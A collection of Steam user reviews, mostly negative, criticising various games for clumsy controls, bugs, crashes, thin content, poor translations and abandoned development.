I have put in over an hour trying to master the controls, but they are impossible.It feels like this was developed as a sit down game and not room scale. You instinctively turn to line up with the ball and not only does it not register this, but you are now not facing the ‘forward’ arrow, so all goes to pot.I can’t bring myself to join an online game as I am struggling to dribble the ball from the centre circle to the goal and shoot with no other players on the pitch. I feel it would be too embarrassing.This was such a huge disappointment as I was so looking forward to a game like this.Needless to say I have requested a refund.
DO NOT PLAY THIS GAME! I am a person who has logged 100+ hours on this game and I regret all of them.I don't know why I did this.Do not make my mistake!Imagine all the worst parts of Black and White, all the worst parts of Black and White 2, take out ANY redeeming qualities, and then ad a ♥♥♥♥♥♥♥ PAY WALL. That's Godus.
Good idea, would love to play it, but just way too buggy in game breaking ways.  Path finding constantly stops working for no reason with no way to recover until the meeple dies, etc.  I like these kinds of games but regret buying this one.  I could have been lots of fun, shame.
While I overall Can't reccomend this game, I will say I was a bit split.  The game excels at being a weird, WTF prompting, mind bending adventure.  The game sucks at being a fun to play game though which is why I can't actually reccomend it.  As far as the story goes, the game is absurd, hilarious, and will have you questioning what is going on the entire time (mostly in a good way!)  If you enjoy  game that just wants to mess with you maybe you should check it out.However the actual gameplay is clunky, confusing, and can be breaken down to a series of unrelated mini games.  The game progresses through mechanics seemingly at random.  At first it's a game about exploration, then it's a dodging mini game, bike racer, then puzzle solver.  None of these are done well, and you're fighting the mechanics every step of the way.Basically I could only reccomend this game if you're into the YouTube scene.  It makes a great wierd game to play for your fans, and that's about it's only strong quality.
Ball is way, way too heavy. I don't know what all the other reviews were talking about, but I've been playing organized basketball for well over two decades, and without an absurd amount of "assist" turned on, it feels like trying to throw a bowling ball into the hoop.
The original Crazy Machines (and 1.5) are a lot better than this game. I do not recommend that anyone gets this game.
Gets boring fast
I played a lot of RPG Maker Games but Legionwood showed me the bad sides of this genre.It actually punched me right in the face.Dont get me wrong, hard games are okey but i acutally like to have a choise.This game forces you to grind in the first real area after the intro fights!Story might by tempting but there a so many good games around, nope. Sorry. Not this time.No grinding for me pleaseIf you like games who come around hard from the beginning this might be a game for you, if not -&gt; a lot of fish in the ocean.
Fun at first but after the 1st Act, everything feels like a drag.
Not worth the 59 centsThis is a complete waste of everythingI don't think I've ever seen less effort put into building somethingImpressively bad
I probably would not recommend this game. I was looking for a fun rental/landlord simulator game but this is not it. You start off with money and buy houses to rent and generate income. It's kind of weird that every house is for sale in town. The game moves too slowly even in 3x speed especially considering you can't save your progress. The mini games take forever and really aren't worth the income. Most of the game is spent waiting around to collect rent and waiting to get enough income to but a new house. That would be alright but you have to restart every time since you can't save. I would also like to see some more elements added in. May you have to negotiate with tenants or deal with the setting of neighborhood?
Was quite confusing to start as no instructions at all. I would enjoy if not for having to click each store to get the sales $$.  once you ahve a few levels of the mall it is stressful not enjoyable having to click click click. Crossing my fingers they change that function as I would enjoy it otherwise. Not likely to play again if not changed but for $3 oh well..
Do not buy - developer censors the art!TL;DR = look up " PassPartOut " if you want an actually fun art game that isn't heavily censored or limited in gameplay.If you want to give your kid a game to play, this one's fine. I consider it a better artist outlet than it is a vocabulary builder- but I'm not 6 so maybe it is. But if you want a software means to build a bit of creativity, then use the free-brush tool and let them do what they do.Tl;dr - for 1$ on sale, it's just 'sort of worth it', NOT really though. As a creative outlet for kids or a game you can stream and be funny (just DON'T save those pictures! see below). It's alright. For full price? Wouldn't advise.Edit: just remembered, you don't walk around. The camera moves from letter to letter automatically. It stops a couple of times crossing the river to see the water- but carries on. I did think you walked from letter to letter - which, I guess wouldn't be optimal for kids and would require more physics work and all - but I really wanted an emotional walk around, you know?http://steamcommunity.com/sharedfiles/filedetails/?id=717102945Also I got banned from this PRESTIGIOUS AND POPULAR game's community page because I replied to a joke question thread with a joke answer. The developer is the kind of guy who doesn't understand jokes, blocks and reports you. I mean, that just turns a recommend into a no-go! :CFrankly, the team behind this game doesn't seem to allow the community to express themselves through the medium of art; and they report and ban pictures that they don't like. That sort of censorship on an art game doesn't lend itself to supporting those thinking differently about art.
The game has potential, but the controls pretty much kill it dead.The slow-motion doesn't feel under the player's control at all (it seems to be triggered by sliding toward a breakable block and stops when it feels like it). The controls are a little awkward but with no way to re-bind them. The distinction between 'fire', 'slide', and 'drop' feels arbitrary. Combined with the slide activating slow-motion the shift key becomes a grab bag of slide, drop, fire, activate slow motion.None of it is exactly a deal-breaker alone but it adds up to a frustrating, flow-breaking experience.. All in all, this game could have used more separate keybinds, less slow-motion, and rebindable keys.
This game lost the plot around when it found JesusOr for a longer, less snide version: - The game is visually beautiful and starts out doing something interesting, but then gets bogged down in clunky storytelling and equally clunky minigames. - Toward the end, pushes you into choices and sometimes gives you options where you can't actually tell what you're picking. - The scenes go on too long - didn't really need 30 seconds of listening to extremely wet noises over an essentially still frame.
I bought this game while it was still at Early Acess. I liked that it has a native version for linux and I was hoping that it could evolve to something closer to the famous Chessmaster software. But it was a huge disappointment. The interface sucks and this game miss some key features: no option to setup the board, no way of taking back a move, no tournament options, no way to rotate the board or change your angle of view, and you can't change time levels after the game has started, amongst other things. The worst: as you can't select a different time level for each player, the only real way to weaken the engine is the "blunder" feature of stockfish, which leads into a very artificial game (the feeling is to play against a player with very solid knowlege which all of a sudden would do a very stupid move). The graphics are fine, but the way as this game is now I wouldn't recomend it even if it was for free (Lucas Chess and Arena are better options and they are free). It is a pity as Chessia had a great potential.
Car mechanic simulator 1640, this game is ♥♥♥♥ and trash. just dont spend money on it.
This is a neutral review (neither 'YES' nor 'NO'). It's a game for Tetris enthusiasts only. If you're one, than thats for you. If you're not I would recommend a different indie/puzzle/casual game as the twist mechanism does not improve much on the original Tetris experience.
Bad translations kind of ruined it for me, kinda hard to justify in a story driven tactical rpg.I like this style of game, I don't mind the graphics being on par with snes / sega genesis games like shining force...but it's hard to get into a story when you can barely understand what they are saying.Also a little information since the current rewiews are sorely lacking in this aspect.Options include - volume control                           - fullscreen / windowed selection                           - That is it.No controller support for what is basically a 2 button game, aka yes / no, or  select / cancel.For 5 dollars it didn't seem like a bad game to waste time in but the translations were more then I could personally stomach after playing 2 battles.( as a side note the voiced part of the opening was decent, but the text between battles was pretty bad) If there was a neutral review option I'd give it that, but since there isn't and I requested a refund...I'm going to have to say thumbs down....Shining force 1 and 2 are like 3 dollars each if you want to play the actual games the combat system for fire emblem came from.
From the initial view I expected something similar to Settlers III, graphic and gameplay likewise, but was let down.The overall game is designed too slowly paced and too complicated at the same time. After planning a path for a road you need assign a worker to every single tile. The annoying part is that they have to return to the main building before you can assign them to another tile, giving the game the pace of a browser game like OGame or Farmerama. Basically you need to sit there and wait for your guys to return during the first minutes of the game, not able to do anything else.The explorer you need to locate new areas cannot be sent into unknown territory and sticks to the tiles, which slows him down alot as well.So overall this game bores you before it even actually started to show you some and adds way too much micro management for a handful of buildings. Plus the english localization appears to be scrappy (missing words etc).
Came for the yuri, stayed for the death game, left completely bored.
Multilayer with a friend doesn't work, and disconnects the private room constantly.AI play is impossible to beat after a few games.Don't waste your money.
Starts strong. Finishes poorly.
In a nutshell:It's very pretty, but that's the only draw tbh. Puzzles and HOGs are okay. The story is solid enough, but doesn't quite fit into the series, and needlessly frustrating "combat" sequences repeatedly killed the enjoyment for me. If you've simply got to finish the series on principle, then go ahead. But otherwise it's not really worth the 3-4 hours I sunk into it.The Long Version:I wanted to like this game. I tried. I did like the art. And parts of it were almost fun. But ultimately it fell short thanks to the inclusion of aggravating action sequences in a supposedly chill game genre. Story &amp; GameplayAside from the title, this game has little to tie it to the first 3 Demon Hunter titles. The secondary character is named Dawn, who you played as in the first 3 games (you play as her niece in this one), and there are a couple of mentions that the thing you're chasing is a demon. But that's about it. It feels like one big bumbling quest to rescue Dawn and some random girl's brother from an Egyptian god gone rogue. And Dawn is nothing like the badass chick from the first 3 games. She's reduced to "helpless damsel in distress" status. Not a great way to end a character arc, guys.Skippable pedantic nerd tangent: The thing is, Set is not technically a demon. I guess he could be seen as demonized after certain evil deeds, but he was always more of a god/deity. A jerky tricker deity like Loki or Reynard the Fox, but still a deity. You can probably argue that both Loki and Reynard were kind of demonic in their own way too, but that's beside the point. Set is not even in the same class as the other actual demons that Dawn hunted down in the other games. The other issue is that the "demon" that periodically attacks you with his cronies doesn't even look like the standard depictions of Set. I have no clue what the connection was supposed to be between them. Why not just have that skeleton-ish creepy dude be the focus of the whole plot? Everything else seemed like just an elaborate excuse to use an Egyptian theme as window dressing, almost like the art assets (as lovely as they are) already existed for an unrelated non Demon Hunter game and they just combined everything. Remember Star Fox Adventures/Dino Planet? Kinda like that.GraphicsThe art's great - characters, backgrounds, and items. I took a bunch of nice screenshots, which is kind of a personal gauge for me. It may sound shallow or silly, but there aren't many games that make me want to grab screen after screen of locations and cutscenes (or even puzzle layouts) specifically to add to my desktop background rotation folder. I was even impressed with a couple of the character designs for the Egyptian gods. Bast in particular had probably one of the most aesthetically-pleasing NPC designs I've ever seen in one of these games. HOGs &amp; PuzzlesThe HOGs were pretty nice visually, and a couple were trickier than normal. But the GUI became a pain in the neck very quickly. Normally the hotspot to back out of a HOG scene is all the way at the bottom of the window, but in this case both the top and bottom of the inventory strip register as the "back" hotspot so it's very easy to back out of scenes unintentionally. I don't know if that over-sensitivity was a glitch or intentional, but it was annoying either way.Puzzles were kind of interesting, and a couple were unique, but most were either very easy or the instructions were too obscure to grasp right away. Like in the tree puzzle on the second portal toward the end, it took me a long time to realize you had to click the button in the upper left to switch to the next tree. Until then I thought I hit a bug or something.That Godforsaken Combat MinigameHoo boy. There are other quasi-minigames, but I'm only going to focus on one here, because it's the ultimate fun-crusher and dealbreaker for me: those ♥♥♥♥♥♥♥♥♥ shoot-the-wraith combat sequences. Basically the Big Baddie creepo guy sends 3 of his wraith minions at you, and you have to zap them one at a time with your Magic Glove™. If it was simply a case of having the player control the crosshairs, and then click to shoot, that would be tolerable. But this game commits the unforgivably egregious sin of "drunken crosshairs auto-aim", which I personally cannot STAND. Once the sequence begins, the cursor starts moving by itself in a ridiculously complicated drunken dance around the screen, and you only have a split second to click and shoot as it turns blue when it passes over a wraith. There are 2 major problems with this, aside from the forced crappy aim: 1) The glove has a "cooldown" of sorts, and you can't shoot two times in quick succession even if the cursor is blue again and it's technically a valid shot. Which practically guarantees that...2) you will have to sit on your thumbs and WAIT until the drunken cursor dance does its thing all. over. the friggin. screen. until it FINALLY meanders over the right spot again. Rinse, repeat. Miss again and your thumbs are gonna get numb from all that waiting. So basically, "combat" consists of lots of artificially-padded waiting time interspersed with "dammit why can't I shoot again, it's BLUE, dammit!" internal raging. Oh, and you have to repeat the same exact thing at least 3 or 4 times. Maybe 5? I don't remember exactly, and I don't care to play again to double check.Another strike: During a "boss" combat sequence toward the end (with the same drunken-aim mechanics), the game simply stopped registering any clicks. Nothing responded, so I had to Alf+F4 and relaunch. It started back in the middle of the fight and the last shot worked thankfully, but by then I was just glad it was over.Other StuffScrew the other stuff. The combat bits aggravated me enough to overshadow everything else. I have literally no interest in revisiting the game, even in my mind, to nitpick the rest of it.To sum up:If you don't mind stupidly engineered combat fights in a HOG, give it a shot. If you're like me and just want to play a chilled out HOPA without raging, it's probably safe to skip this one.
ive played this since around 2014 on the flash version and i love the game, but if you have ppg (people playground) i don't think you should get this the controls are better there the workshop is and its overall a better game , if your a hard core fan you should get it but nostalgia made me think of this as a great game but it just doesn't hold up post flash. ill miss this game i did grow up with it but its basically dead now
this game idea is great and its full of enjoyment but i dont know how or why i downloaded it again recently and it keeps crashing every 5 minutes !! please help !!
If you're looking for something that's going to entertain you for longer than 30 minutes this isn't the game. This game was shelved by developers after update 1 its been about a solid year since anything has been added or fixed. If you're looking at this game thinking it will be fun because you want to make some crazy sandbox ship battles happen you wont get much.
I don't want to give this a good review.... Because of the neglect of this simple game by the Dev/s. It is a very good idea for a game. Too bad it was made and then forgotten about, regardless of its quirks. It is fun. It is worth about a dollar, maybe 2. But, it is buggy and slow even on beast equipment. Lacks polish and variance. Would really love to see a good Tetris VR implementation, unfortunately this doesn't take the cake.5/10.I'll fix my review if the dev/s fix the game.
This game had an interesting concept, but it also seems super rushed.There are way to many "use your environment" parts that could have been made a bit better, and the puzzles were sometimes hard because they weren't optimised properly, one part had a jump that if you were slightly off you died in a red barrier. The blue gel also had issues, where sometimes if its placed on a wall, it wont activate (Even when you press space)  and sometimes same with the floor.I know this mod is old by now, but that should have allowed for updates to fix these problems. I forced myself to finish it so i could fairly review this mod.I suggest, if you do plan to buy this mod, wait for it to go on sale, and prepare to be angry at how many sudden unavoidable deaths and restarts you'll have to go through.
game is pretty shallow. If it evens works for anyone.
24 minutes to complete.Uninspiring and boring "puzzle" game. Thin Ice on Club Penguin was better than this
Unplayable sadly. We got this to have a light fun game to play after new years but every mini game we tried was not playable. We tried resetting the sensors and re-aligning ourselves in the center of a moderate level room and every game was hilariously unplayable. I'm sorry but this was a huge disappointment even for 5$. Out of my 15+ games this has been the only one that has been too buggy to play.
This is a strange case. This is a fun game and if you get it you would enjoy it. Yet, the game is only half complete and hasnt gotten any meaningful updates in a very long time. So, here is a negative review that will stay negative till i see any actual updates.
The game is good but so limited stuff to sell plus what annoys me is I bought this game when it first came out in development. I do not understand why they do not add the option for people to create and add mods to the game. The Developers do not even add enough items to cook, or items to create. This is why I do not bother with buying games right away. Many of us have asked for Mods because of the small selection to sell. Gets boring when having the same stuff over and over.
VR definitely makes me and most likely you motion sick.I guess if you keep in mind that VR ist optional, it`s fine.
game runs fine till the last day, then the calendar freezes, was seeing patients for 48hrs straight
I really wanted to like this game. Halloween-themed Point&amp;Click? What could possibly go wrong?Well, while the story is nothing special but acceptable the game dynamics made me quit playing this game. It's annoying and buggy from the beginning but after some time I encountered a bug I wasn't able to work around. Reloading etc. didn't help either.Didn't start anew, just quit the game.
As a daily BoxVR and Beatsaber player I tried this game looking forward to testing the custom song import feature. Unfortunately I cant recommend this game as I found the following:---The hitbox and the feeling of hitting the ships is not satisfying---The ship patron generated for the imported songs has nothing to do with the melody.---It is a rhytm/exercise game and does not have any sound settings whatsoever. This is particularly bothersome because the ship hitting sound effects are way louder than the melody.--- The right glove color is RED...Considering that beatsaber is the leader in the field, I think all rythm games should have an option to change colors since it is extremely annoying play with opposite colors of what we are used to.The game incorporates a novel idea about fighting something while hitting the "notes" and I think this has pottential but the whole idea is not well execute IMHO.
Awful controls don't make a game; this is not a mechanic, it's a joke. Buy it if you're an idiot hipster who thinks irony is fun. "GET IT, IT'S AWESOME BECAUSE IT'S SO DAMNED TERRIBLE! YAY!"
When I reached steam level 10 I was given a 90% coupon for this game making it only $1.80. It is so bad I want my $1.80 back. I went inverted sometimes with no rhyme or reason. The tutorial was bad. I don't recommend.
Before Fading Hearts i've played TONS of Visual Novels and Dating Sims. I knew nothing about Fading Hearts before I decided to pick it up not knowing what to expect. From the main store page it seemed interesting enough for the $10 I paid for it. I have to say, I was quite dissapointed to be frank.First I'm going to go over what I liked about the game. The gameplay was really interesting and fun, definitely felt more closer towards a Dating sim. You get stats you can raise by doing various activities throughout the day and the stats (usually) have some effect on the game, such as how much money you get and beating certain monsters in the forest. There is a combat system, though not very in-depth, was entertaining for the first few times. And the game strongly encourages and is ment to be played with multiple playthroughs for all the endings, even including some cute dialouge at the end of each playthrough that provide hints on what to do on your next one.One thing that interested me into buying the game was the "Player-Active Storytelling! NPCs tries to manipulate you, the player!" feature on the store page. I seriously did not feel this at all, in any of the playthroughs. I felt fully in control the entire time as with every dialogue option you can easily see what the consequences were and what path you were going to go down. The "Players can actively manipulate story mechanics once they understand how they work." was just a fancy way of saying choose A or B like you do in any other game/VN, nothing intuitive there.You get stats and other progress bars that you can raise that can influence your money income, and combat stats. It had very good potentional to be very good but in the end it was pointless. You honestly don't need money that much, the only time you really would need to spend money is on things to obtain even more money. You don't need to touch the system at all and can do very well without, theres no real benefit it was a waste of time. You can also choose to do various excercises and train magic spells as well for combat. However, to reach the ending that relied a bit on combat you didn't need to be very strong at all. Once you hit a certain threshold (which isn't very high) it was pointless and a waste of time. It would've been nice if they added something that required or rewarded spending more time on raising those stats.However, the thing that bothered me the most, is that the story was absolutely terrible. I definitely felt like it was more gameplay oriented storytelling than an actual story. Of course the story changes with your actions (as expected with multiple endings and such) but each time I was never satisfied. The climaxes to each ending felt very bland, and the actual endings were extremely cliche and predictable. The characters are REALLY flat and I'm not talking about their chests. They have little personality and no development whatsoever. Side characters are pretty irrelevant and you only speak to certain ones to obtain endings.Lastly, the game is super short. I spent about 15 hours on the game but really thats because I left the game on while I fell asleep. Each playthrough is about 30mins-1hour long at most. If it takes longer, thats because you're trying to figure out what to do to get the other endings which won't take long. You can probably get all the endings in one sitting if you wanted. The game had a lot of potential but I felt like it was released a bit too soon or the writing could've been better. The idea and design was good but it had no depth whatsoever.
This game was so boring that I almost didn't notice when it was actually over.In fact, I didn't notice until I was literally taken back to the home screen.This game abuses a lot of the tactics that hidden object games love to use to stretch out the game time. There must have been dozens of emblems that we picked up to use for this or that thing, with little point to it all. Additionally, the game logic could get so warped at points that I would end up looking for a solution just by throwing everything in my inventory at the problem until something stuck. Not exactly my definition of "fun".There is potential here, though. The story was interesting in places, though constantly distracted by new plot threads. The art was very nice, for the most part. I even liked the characters, somewhat.But I find it difficult to say I enjoyed playing it.
Really is a fun game. However there really isn't an endgame. Once you have everything you want and you've built a base it's just kinda meh.
The game is much impressive in music and frames . But it at should at least BE A GAME. There is mere narration about my furry protagonist. In such a platformer game I can't even jump. I can interact with nothing. The only promotion on my character is data, instead of abilities or something. I enter the game with a super-range gun and that's all weapon you can owe. The two types of dodging an attack is actually boring, since the enemies don't really care to do harm to you. I love your delicate determination on tableau, but please be a better game.
Okay so I purchased two copies of this for myself and a friend so we could play together since it is labled as Co-op + Local Co-op turns out there is only Local Co-op for this game so unfortunately for the misleading information I cannot give this a possitive review however I will update this when/if Co-op has been added.
The style of this game is what intrigued me about it but sadly that is about all it has going for it. It is in a very poor state for a $15 base price and Early Access in my opinion, here is my thoughts.- No real story? The game pretty much just starts and throws you intro it with no introduction or any story elements really to speak of. You wake up, choose your starting monster and that is pretty much it. You then leave your house and pretty much wander aimlessly fighting NPCs.- Monsters all look very plain and generic. They can't evolve, and you can't check any stats of these monsters either once they are in your party. You also can't check to see what any of the types are and can't see what any of the moves do. - Battles are very basic, as stated above you can't see what your moves do so you pretty much pick blindly. You can't see your own HP even it is just a solid bar so you just have to guess on how much you have left? You also can't switch monsters in combat so if you at a disadvantage in a fight you are screwed no matter what. The animations are all basic and they don't really have any sound effects either.- The game doesn't have any items or an inventory at all, very odd in an RPG. You are only able to use a "Capture" skill that will allow you to attempt to capture an enemy monster. Other than that you can heal up at once center and that's it.-No sound effects for anything, interacting, menus, in battle, transitions between areas. It all makes it very jarring. The game is relying heavily on nostaglia with its look and style and is severely lacking in features and quality, I can't reccomend anyone buying this right now especially for a base price of $15.00. It is in a very poor state for Early Access. Hopefully the developer can improve on this but I feel like the price for what currently is here is honestly kind of gross.
Basically, the game is a collection of simple minigames, repeated over many, many levels. The main playing modes amounts to little more than pressing the button that matches the color on the screen, and the other play modes are either basic simulations or platformers. The lack of variety or interesting challenge means that it gets reapetitive fast.
Good game but the bugs are driving me crazy.Hope somebody can fix it or it will be a terrible gaming experience.
TL;DR: good concept, bad developer who ♥♥♥♥♥ it into this game :/ If android game is better than PC game, then PC game is not worth.Longer version:Good game (i mean, connecting dots, not THIS "Dots eXtreme" game). I used to play this game a lot on my phone/tablet like 4-5 years ago. I was expecting almost same game from this. But unfortunately, this is not that case. That android game was amazing, great animation, nice soundtrack, everything was smooth, options as well, and for phone game really amazing, one of my favourite. Easy to play, hard to master, especially more difficult levels. So, why is THIS game bad? Well, when you finish the level, you have to wait 2-3 seconds for animation to continue. Also, mechanics are pretty bad (like, really? in my android version - definitely not this developer - you had exact way how to complete level. I mean, every path between dots had only one solution. Why? Because it was clever. If you had smaller board, you had less colors. But when you started like 10x10, there were more colors. In THIS game, it is so broken and annoying, that you can connect all dots, and you still have some unused space on board. It would be better to have less levels, but every level would be top quality. In THIS game it is like, 1 good level, 2 bad levels, 1 good level, 2 bad levels.)Also, animations are boring, not sure, if there is any soundtrack (if yes, then mediocre). There are like 6 different themes, which is good, but you need coins to unlock them. And after unlocking, you are disappointed, bcs they are mostly awful. But you earn coins by playing the game, so they are free.Oh, and there's also tutorial. But really annoying, because instead of explaining the game mechanics, there's really annoying mouse cursor, which is showing you how to complete tutorial levels :/Really, i am trying to find something positive. Well, achievements and trading cards maybe?As i said, quality &gt; quantity. And this game is just not good, just too many levels, which are boring. Not worth 2€. Go to android store and download FREE and BETTER version of this game. You will save some money, and you can play it even on your way to work, school, during breaks, etc :)
This is it. This takes the cake. This is the worst Steam game I have ever had the misfortune to play. Due to psychological trauma am I not able to recount the events at this time. Please. Do NOT buy. This is not even funny bad. It is just boring and unplayable.
Cool idea with potential. I did the tutorial but afterwards I still couldn't figure out what was going on or what I was supposed to be doing. I play a lot of strategy games and have never had much trouble. But it could be I'm just being dumb ig. Early access so there's still hope it'll improve.
While I only played the tutorial and first few minutes of the game, I have to say that was more than enough for me. The game itself doesn't have much charm other than the artisitic cute design and it feels to be mostly for casual gamers and/or kids. The levels are bit repetitive, I don't really see the appeal to different 'gods' from get go, and the humor aspect also wears out pretty fast after first one or two rounds. It's also way too easy.
Yes, BUT !!!The game is nice but I have some problems with it... sometimes the dialogues are strange we have informations in our choices that we're not supposed to know because we did not made the right choices at this or that level to unlock the information, so we should not be able to tell them. Plus, I was expecting a world a little more cruel, on the complexe and complicated topics like genres and orientations, having no character really obtuse who could be refractory or truly intolerant is strange... This world is a little too much Care Bears for me! The March speaks of intrasque problems in America that can lose us a little, I'm French and I don't really know what's going on overseas. All the informations given to the readers in this chapter are nice, but, for Europeans knowing internet website about american goups loose it purpose. I'm ok with the message but not in a game. It's be like a French game saying if you are a beaten wife call : 39.19. It's not world-wide. I hope you understand what i'm trying to say. Good thing yeah, but maybe put this chapter in an extra. I really don't care about american website about thing I should NOT don't care, but I'm here to play a game... The entire chapter was just boring for me...I did not go though all the game, I just focus on Em, Nora and Marcel, so I'm not done, not even sure i'll try to finish it. The music and some dialogues have made me shed a small tear, but I don't feel to be the person targeted by the game, call it an adult disenchantment, but for me it lacks a little depth especially with the topics covered, I did not expect that story at all, and especially not with heroes that young... they are 14!!!I would have liked a more mature game, maybe even more adult, a game where we could understand the difficulty of the daily routine of Em (good to speak about changing room but that's not the only problem of transgenre people am I wrong? Well there is another problem with Em, how our personnage know Em wants to be refered by they? No real conversation between our personnage and Em enlight this fact, this is a point that would have been good to put in the conversation!)A game where we could understand Marcel's problems with his culture! (Plus if seeing two girls kissing is so... strange for him, how can you date him with a guy without him being wary of that fact? He really seems like he doesn't mind... I'm pretty sure his country is NOT in a "I don't mind" mood with LGBT... Really !!) So yes, I'm not the target of the game, but I cannot manage to put a bad review either. I'm just not the good target for this game and It's clearly difficult to understand what the game wanted to be. A dating game? An helping game to understand difficult topic? A cute game to make us think about difficult topics? I really think the game loose in all  of that. Heroes too young for a dating game, and nothing enough depth to teach us some lessons... Too bad!
I wanted to love this game so badly. It has so much going for it — absurdly cute graphics, fun level design, great music. But the controls were a massive nightmare and the levels were repetitive. I hemmed and hawed a lot about whether to rec this or not and ultimately put it here because I did spend so much time frustrated, but it was also enjoyable, so…? IDK. If the issues that bothered me seem minor to you, you’ll probably enjoy it and should pick it up next time it’s on sale.It’s hard to explain the problems with the controls. You can only jump a certain distance, and you can’t move while you’re in the air. This makes the precise jumping platforming requires impossible. On top of that, sometimes when you hit a wall you turn and face the other direction, and sometimes you don’t, and I couldn’t quite figure out when each happened. So you’d try to chain jump and just end up spinning and going back the way you came, usually dying. And even once I started to get used to the jump distance, I found it absurdly frustrating to have to line myself up just right (which sometimes was impossible) and then press A and cross my fingers. I also found that the controls were not sensitive enough to detect tiny movements back and forth, so a lot of time I’d try to line up a jump over and over and over only to discover that it was almost impossible to get to the exact spot I needed to be in. Worse still, the game was bad at indicating what was coming up — I often found myself getting into a rhythm only to be killed by a baddie just offscreen that there was no way I could have anticipated. This is the worst kind of difficultly in a platformer.But even once I got used to that and got through the first set of levels, I was disappointed to find the other three locked level sets were just the same ones with fewer checkpoints and/or more baddies. So the game was actually only 25% as big as I thought it was, which was super disappointing.Yet I kept playing it. There’s something oddly relaxing about it right up until it gets frustrating. I found myself playing in 10-minute spurts — I’d clear a level, hit a point I couldn’t get past for 5 minutes, quit in frustration, do something else for an hour, and then start over. The game had all the elements of something I liked, but just couldn’t follow through. And it’s so sad, because I want it to work so badly, but ultimately it just couldn’t get its ♥♥♥♥ together for long enough.
If you're looking for an offline AI to just take around, sure, it's an ok small purchase. If you're looking to play online, I think I may just suggest using online-go dot com instead of this, since this only acts as a client for the already free website.A few nit picks with it: the options menu is woefully lacking. Resolution would be great, and it's not quite clear whether 'in' or 'out' is on or off with the options (out is 'off' since I got an achievement for turning off hints)And speaking of hints: I don't think it's quite fair to have a client for another website provide hints, even optional, when the website doesn't provide them. I'm a noob, no bones about it, and I've overlooked an easy atari more times than I can count. This program points them out for you, optionally. That just doesn't sit right with me for online play, but I wouldn't complain if it were regulated to AI matches. And a last big complaint: there is no chat functionality in the program. If you want to talk to anyone on the website you've got to log in with your phone or other device.
2020 set is bugged and doesn't start but i'm glad i didn't have to sit through it.No surprise that this ideological cringe fest is a professors work. They managed to convince students to buy their trash both irl and on steam.redditor dev OMEGALUL
Beautiful game, but it's very slow.  Not enough interactive gameplay to be interesting, not enough story to just passively enjoy it
A game where you just go up and down should NOT be paid. Seriously, that's all.It gets boring after just 5 minutes.
Hot garbage. Avoid. Abandonware
This is expensive for an Early Release in this state. The foundations are there for something half decent in the future, but current the physics are way too simple. Of course you can flick your wrist etc to make a shot, that will always be the case, but you as the player should be making a full swing. However the game doesn't do a good job of translating the swing to ball flight. Now I don't expect the realism of an expensive simulator, but whether I do a decent swing, or literally smack the ball in to the ground with the driver, the ball will basically always fly with the same loft, you have no control on how high you hit the ball. Other ♥♥♥♥♥♥♥... could maybe do with more nature background noise as an option, and adding a tee to the driving range, plus picking a club could be fiddly, but these are to be expected for an early release. All in all it's by no means terrible, but over priced for sure, and the store page over sells the physics involved.
Hard to pick yes or now, I'll go with the not recommended option, because of the questionable quality of the game.The game is unusually cheap, only 3€, less than half of the usual Hidden Object Games ( ~8€) - this can be a strong point if you want to get it - around 1€ it's an okay purchase if you know what are you buying into.The game was obviously made for machines with touchscreens  - there is no accuracy to speak about, sometimes clicking on the middle of the screen brings up an action that's linked ot the very right side of the screen.  Active zones are light up if pointed at, effectively showing how huge the clickable area is - while this is not a real negative, it takes away the precision from the game, resulting in much less actions / screen, and puzzles are also affected: instead of a hold and turn rotating puzzle, you need to click on the parts, because that's easier to do with touchscreen.There are several problems with the game's english - having typos (they / there, can or can't) to the point of it was calling a half plastic glass a watering can (wasn't even used for that purpose, it was a funnel), a tool handle was called a broomstick, achievements asking for completing a game on expert while in the game the harder difficulty is called advanced mode.While these doesn't affect the game, it reflects some of the care,attention  and (maybe the lack of?) money the game got.Speaking about money: I'm pretty sure they had budget problems during the creation of the game. The full cinematic parts are done relatively well. Not outstanding, but pretty nice for HOGs.  But at the same time, the quality of ingame animation hit rockbottom after a point. At the start of the game you crack a wall with a pickaxe - the pickaxe is swinging, like you're moving it above your shoulder. Pretty nice.  Later on fumigation of bees is the fumigator floating up to the beenest, and not even a single puff. They just disappear. Using a diving mask to go underwater?  Mask floating to the water, then it's accessible in a way that you can just move underwater. Birds flying like in the infamous Birdemic movie. Items not even being rotated when used - keys floating to locks while pointing to the other direction, and things like this.So in short:- The usual vampire story, nothing of interest- Supereasy interaction, which results in oversimplification- Really nice stills (environment, characters) and cutscenes, but terrible item-interaction animations- Questionable english at many pointsIf you want a good hidden object game to get into the genre, avoid this game. If you want this anyways, get it on a sale.
Don't play it without friends
I have no idea what this game is like as I've only been able to see the splash intro screen, before it crashes.  It's crashed 17 times in the short time I've owned it.  It seems like the kind of game I'd want to play, and yet, I can't.
I have been waiting for this game for a while now, but I was quite dissapointed to find that this game is almost impossible to play and simply function properly without a controller.
not worth the time or money like i thought
The game is quite short and they have recycled minigames from the previous game. It is worth buying only if you have not played the first chapter and the price is at least -60%.
This game is advertised as one that you could play with your eyes closed.  This is false.You are required to distinguish between blue balls and dark blue balls by color and that requires sight.Also, if you don't understand Russian, then you must read the subtitles and that requires sight.I would change my review if the distinguishing characteristic of the balls were based on sound, but as it is I was disappointed.
Good and short game for one time play. Recomended only for few bucks or free. And for kids
Valve Index Users - Buyer BewareThis game advertizes support for Valve Index, however the in-game controllers look like Vive Wands which is very counter intuitive and looks and feels wrong. It does not appear to have ANY native Index support at all.
Pretty sure it's used for bitcoin mining
If your monitor has ghosting issues, or just inst that great some of the game modes are just unplayable.
I purchased this for my children in hopes of expanding their educational. Unfortunately, it turned out to be a buggy mess with horrible controls. Purchased on launch date, a week, I was hoping the developers would have fixed the bugs by now. Joystick controllers will launch your character sideways, frequent stuck in the walls and there isnt even a QUIT game option on the main menu!Interesting concept if it was executed properly, but at this state, it's shovelware at it's finest. Steam refund requested.
Game is garbage only 3 levels and the achievements don't even work not even a single one. Even tho this stupid developer claims it's fixed it is not!!!!!!!!!

